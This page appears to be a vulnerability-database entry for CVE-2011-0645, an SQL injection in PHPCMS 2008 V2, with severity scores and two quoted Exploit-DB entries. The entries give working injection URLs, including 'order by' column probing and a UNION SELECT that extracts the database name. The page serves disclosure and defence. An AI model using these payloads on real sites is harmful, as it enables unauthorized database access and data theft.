CVE-2011-0645
published 2011-01-25CVE-2011-0645: SQL injection vulnerability in data.php in PHPCMS 2008 V2 allows remote attackers to execute arbitrary SQL commands via the where_time parameter in a get…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.4th percentile
SQL injection vulnerability in data.php in PHPCMS 2008 V2 allows remote attackers to execute arbitrary SQL commands via the where_time parameter in a get action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpcms | phpcms_2008 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpCMS 2008 - SQL Injection
exploitdb·2011-01-20
CVE-2011-0645 phpCMS 2008 - SQL Injection
phpCMS 2008 - SQL Injection
---
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software: Phpcms 2008 V2
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: Xp10_hACKEr & 403-T3AM
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 17.jan.2011
[?] T!ME: 05:15 am GMT
[?] Home: WwW.XP10.COM
[^]� Xp10_hAcKEr
[?]
# REMOTE SQL iNJECTioN Vulnerabilities
[*] Err0r C0N50L3:
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
[*] prove of concept =
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
Already Tested on Win Xp
[~]-----------------------
Exploit-DB
phpCMS 2008 V2 - 'data.php' SQL Injection
exploitdb·2011-01-17
CVE-2011-0645 phpCMS 2008 V2 - 'data.php' SQL Injection
phpCMS 2008 V2 - 'data.php' SQL Injection
---
source: https://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--
No writeups or analysis indexed.
http://osvdb.org/70655http://securityreason.com/wlb_show/WLB-2011010077http://www.securityfocus.com/bid/45913https://exchange.xforce.ibmcloud.com/vulnerabilities/64828http://osvdb.org/70655http://securityreason.com/wlb_show/WLB-2011010077http://www.securityfocus.com/bid/45913https://exchange.xforce.ibmcloud.com/vulnerabilities/64828
2011-01-25
Published